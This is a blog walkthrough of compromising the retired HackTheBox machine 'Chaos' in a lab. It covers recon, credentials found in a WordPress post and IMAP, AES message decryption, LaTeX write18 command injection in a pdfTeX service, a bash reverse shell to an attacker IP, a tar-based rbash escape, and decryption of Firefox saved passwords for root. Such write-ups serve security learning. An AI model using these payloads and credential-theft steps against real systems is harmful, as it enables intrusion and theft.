HacktheBox — Chaos

sif0
11 min read, May 25, 2019

This is a write-up on how I solved the box Chaos from HacktheBox.

source: https://www.hackthebox.eu/home/machines/profile/167

Hack the Box is an online platform where you practice your penetration testing skills.

About the box

This box is fun. It’s unlike the other boxes I have solved, and it trolled me more than another box that is not yet retired as of the moment I am writing this.

Overall, I was learning every step of the way, even though the box gets a lot of hate for being “chaotic” :)

TL;DR

Initial foothold: mail creds obtained through an unfinished blog lead to an encrypted message, which points to an undiscovered directory hosting a document preparation service (pdfTeX) that allows command execution
User: reusing creds and escaping restricted bash
Root: digging through the Mozilla profile data in the user's home directory and decrypting the stored creds

I first ran an initial nmap scan, saving the output to the nmap directory:

nmap -sV -sC -oA nmap/initial 10.10.10.120

The output is:

# Nmap 7.70 scan initiated Sun Dec 16 18:34:59 2018 as: nmap -sV -sC -oA nmap/initial 10.10.10.120
Nmap scan report for 10.10.10.120
Host is up (0.32s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE STLS CAPA RESP-CODES TOP UIDL PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more SASL-IR ID listed LOGIN-REFERRALS IMAP4rev1 LITERAL+ OK post-login have ENABLE LOGINDISABLEDA0001 capabilities Pre-login STARTTLS IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: SASL-IR ID more LOGIN-REFERRALS IMAP4rev1 LITERAL+ AUTH=PLAINA0001 post-login have ENABLE capabilities listed Pre-login OK IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE CAPA USER RESP-CODES TOP UIDL PIPELINING
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/

Since port 80 is open, I first go to the website:

It tells us “Direct IP not allowed”, which means that we cannot access it by simply typing its IP in the URL.

I edited my /etc/hosts file and added an entry so that chaos.htb resolves to 10.10.10.120:

10.10.10.120    chaos.htb

The website can now be viewed properly. I poked around the website, checking its functions, and found a “blog” section which only tells us that they are working on a blog.

I also ran gobuster on chaos.htb, using the directory-list-2.3-medium.txt wordlist and saving the output to the file gobuster.initial:

gobuster -u http://chaos.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.initial

The results are:

/img (Status: 301)
/css (Status: 301)
/source (Status: 301)
/js (Status: 301)
/javascript (Status: 301)

I then checked each directory for anything interesting, but found nothing. /javascript is forbidden, by the way. Since I found nothing interesting, I ran the same gobuster command against 10.10.10.120 and the output was different:

/wp (Status: 301)
/javascript (Status: 301)

The wp directory stood out, and it led me to a WordPress site which tells us that the content is password protected. This is funny because it is a post by the user human.

http://10.10.10.120/wp/wordpress/index.php/2018/10/28/chaos/

If you use the password “human”, the post reveals the webmail creds:

I tried the obtained credentials on Webmin at port 10000, but they are invalid. I had been avoiding the IMAP and POP3 ports since I hadn’t used them before, but I was left with no other options. After much reading, I was able to log in to the IMAP service and issue commands (this write-up does not do justice to the many failed attempts I had trying to “talk” to this service…).

I found this link to be very helpful: https://easyengine.io/tutorials/mail/server/testing/imap

I connected to the IMAP service with the following command and used the creds obtained from wp:

openssl s_client -crlf -connect 10.10.10.120:993

The “A” character is a tag, so the server can match its responses to our requests. Every time we issue a command to the server, we should prefix it with a tag (in this case, the character “A”).

I authenticated by invoking:

A LOGIN ayush jiujitsu

As you can see, I had numerous failures in trying to talk to this service. After enumerating, I found that there is one message in the Drafts folder.

The content of the message can be retrieved with:

TAG FETCH 1 (BODY[text])

The output is:

MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowed
Hii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
--=_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804
--=_00b34a28b9033c43ed09c0950f4176e1--
)

It’s an encrypted message from Ayush to Sahay. The script used to encrypt it is also included. I noticed that both attachments are base64 text. Decoding the en.py section results in:

import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    # 16-character, zero-padded ASCII plaintext size, written ahead of the IV
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    # pad the last chunk with spaces up to a 16-byte multiple
                    chunk += b' ' * (16 - (len(chunk) % 16))
                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    # the AES-256 key is the SHA-256 digest of the password
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

We are given clues on how to decrypt the message by leveraging what we know from the encryption script. The next step is to decrypt the encrypted message using a Python script. The first thing I did was Google the script (since I’m not confident with my Python skills yet).

I came across this after seeing that part of the encryption script is included in it:

https://github.com/bing0o/Python-Scripts/blob/master/crypto.py

After some googling about AES encryption and a lot of reading (this step stumped me, as I hadn’t brushed up my coding skills), I also noticed that the encrypted message starts with the pattern

MDAwMDAwMDAwMDAwMD

Since I had no idea about the format of the encrypted text, I tried base64-decoding the first section of the message. After decoding, the output is:

0000000000000234zسpK8ZC⁹kWbase64: invalid input 

After trying to understand AES, I noticed that 0000….234 is the IV and that the key is sahay (according to the message):

import os
from Crypto import Random
from Crypto.Hash import SHA256
from Crypto.Cipher import AES

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    IV = Random.new().read(16)
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))
            outfile.write(IV)
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))
                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    hasher = SHA256.new(password.encode('utf-8'))
    return hasher.digest()

if __name__ == "__main__":
    chunksize = 64*1024
    mkey = getKey("sahay")
    # the first 16 bytes of the decoded attachment, used here as the IV;
    # in CBC a wrong IV only garbles the first 16-byte block, so the rest still decrypts
    mIV = b"0000000000000234"
    decipher = AES.new(mkey, AES.MODE_CBC, mIV)
    # demsg.txt is presumably the base64-decoded enim_msg.txt attachment
    with open("demsg.txt", 'rb') as infile:
        chunk = infile.read(chunksize)
    plaintext = decipher.decrypt(chunk)
    print(plaintext)

Decrypting the file results in:

gX)V#IqHy:šTWsLPOSGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK

After removing the gibberish parts and base64-decoding the rest with this command:

echo SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK | base64 -d 

The output is

Hii Sahay

Please check our new service which create pdf

p.s - As you told me to encrypt important msg, i did :)

http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Thanks,
Ayush
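As an added example (not the author’s script and not part of the original write-up), here is a Go version that parses the layout en.py actually writes: 16 ASCII bytes of plaintext size, then the 16-byte IV, then AES-256-CBC ciphertext of the space-padded message, keyed with SHA-256 of the password. The message, IV and password below are constructed, and the encryptor takes the IV as a parameter so the result is repeatable; the raw cbcDecrypt helper shows why decrypting with the size field as the IV, as the script above does, still yields readable text after one garbled block.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"fmt"
	"strconv"
)

// getKey mirrors en.py: the AES-256 key is the SHA-256 digest of the password.
func getKey(password string) []byte {
	sum := sha256.Sum256([]byte(password))
	return sum[:]
}

// cbcDecrypt is raw AES-256-CBC under a caller-chosen IV. In CBC a wrong IV only
// garbles the first 16-byte block, which is exactly what the write-up observed.
func cbcDecrypt(password string, iv, ct []byte) []byte {
	block, _ := aes.NewCipher(getKey(password)) // 32-byte key: cannot fail
	plain := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, ct)
	return plain
}

// encryptMsg reproduces the en.py layout (16-char ASCII size, 16-byte IV, CBC
// ciphertext of the space-padded message); the IV is a parameter for repeatability.
func encryptMsg(password string, iv, msg []byte) []byte {
	block, _ := aes.NewCipher(getKey(password))
	padded := append([]byte(nil), msg...)
	for len(padded)%16 != 0 {
		padded = append(padded, ' ')
	}
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append([]byte(fmt.Sprintf("%016d", len(msg))), iv...), ct...)
}

// decryptMsg parses the header instead of guessing: bytes 0-15 hold the original
// size (used to strip the padding), bytes 16-31 the real IV, the rest ciphertext.
func decryptMsg(password string, blob []byte) ([]byte, error) {
	if len(blob) < 32 || (len(blob)-32)%16 != 0 {
		return nil, fmt.Errorf("malformed blob of %d bytes", len(blob))
	}
	size, err := strconv.Atoi(string(blob[:16]))
	if err != nil || size < 0 || size > len(blob)-32 {
		return nil, fmt.Errorf("bad size field %q", blob[:16])
	}
	return cbcDecrypt(password, blob[16:32], blob[32:])[:size], nil
}
```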

We have now recovered the message. After accessing the URL, I ran gobuster to find interesting directories:

/templates (Status: 301)
/pdf (Status: 301)
/doc (Status: 301)
/assets (Status: 301)
/source (Status: 301)
/tex (Status: 301)

After checking each directory, I found that the link creates PDFs.

I then decided to use Burp to intercept the PDF creation request, hoping for command execution.

The software running is pdfTeX. I tried searching for an exploitable vulnerability but found nothing until I came across this link during my research: https://0x90r00t.com/2016/02/29/internetwache-ctf-2016-web-90-texmaker-write-up/.

It’s an old CTF write-up on exploiting LaTeX. You can read more about the details in the link provided.

After inserting “\immediate\write18{id}”, I got a reply of www-data.

I now know that I have code execution on the box. Next I try to get a reverse shell, but before doing that, I need to verify the exact location of bash.

We prepare for our reverse shell by setting up our listener:

nc -nlvp 9001

We now tell the machine to connect back to us using the following command (URL-encoded, as it doesn’t seem to work in plain form), placed inside the curly braces:

/bin/bash -c "bash -i >& /dev/tcp/MyIPAddress/9001 0>&1"

We get a reverse shell.

I then invoke commands to have a proper shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Hit Ctrl-Z and invoke

stty raw -echo

Then press enter twice. Lastly, i also invoke

export TERM=xterm

These commands give me a better prompt, tab completion, and the ability to clear the screen.

Getting User

After much enumeration, I found creds for MySQL, but they didn’t work for su. I then tried the creds that we found in WordPress earlier:

ayush:jiujitsu

And we have successfully escalated to the user ayush. After trying to issue commands, I realized that we are in rbash (restricted bash).

I searched for ways to escape it and found these resources to be very helpful:

Linux Restricted Shell Bypass

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

Restricted Linux Shell Escaping Techniques

Escaping Restricted Linux Shells

I then invoked export to check the environment variables.

Simply changing SHELL to /bin/bash didn’t work:

export SHELL="/bin/bash"

I tried the examples listed in the references above, trying every command and example. I then decided to try the SSH escape (under the advanced techniques of https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf), but realized that port 22 is not open (not sure if this has something to do with it, but I decided not to try the SSH escapes).

I then started from the bottom of the list and tried the escape using the tar method, which worked:

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

I ran basic commands like id and whoami to check whether they work.

Seeing that the error has something to do with the PATH environment variable, I changed PATH using the command:

export PATH="my box's path" 

I can now run the id command and check that user.txt is legit (it is, since it has 32 characters + 1 line break = 33).

Getting Root

I then enumerate by listing the contents of the home directory.

What struck me is a hidden directory called .mozilla. Digging into it, I came across a file called profiles.ini whose path points to bzo7sjt1.default (also in the same directory as profiles.ini).

After listing the contents of the bzo7sjt1.default directory and finding a logins.json, I quickly ran cat on it, hoping to find creds inside. I see fields that may be helpful to us.

Since the username and password are encrypted, I searched for “firefox logins.json decrypt” and stumbled across the first suggested result: https://github.com/unode/firefox_decrypt

I saved the script, named it firefox.decrypt, and made it executable by invoking:

chmod +x ./firefox.decrypt

I ran it to get the creds:

ayush@chaos:~/.mozilla/firefox$ ./firefox.decrypt bzo7sjt1.default/
2019-05-15 07:25:29,926 - WARNING - profile.ini not found in bzo7sjt1.default/
2019-05-15 07:25:29,927 - WARNING - Continuing and assuming 'bzo7sjt1.default/' is a profile location
Master Password for profile bzo7sjt1.default/:
Website: https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

It seems that these are creds for port 10000, but since we were able to privesc a while ago using su, I tried it again:

The creds work and we are now root. They also allow you to access Webmin on port 10000, but I didn’t play with the GUI to check whether there is anything else interesting.

So that’s how I did the box Chaos from Hack the Box. I hope you learned something from this walkthrough. Cheers! 🍺

sif0

Penetration Tester | Aspiring Red Team Operator 🇵🇭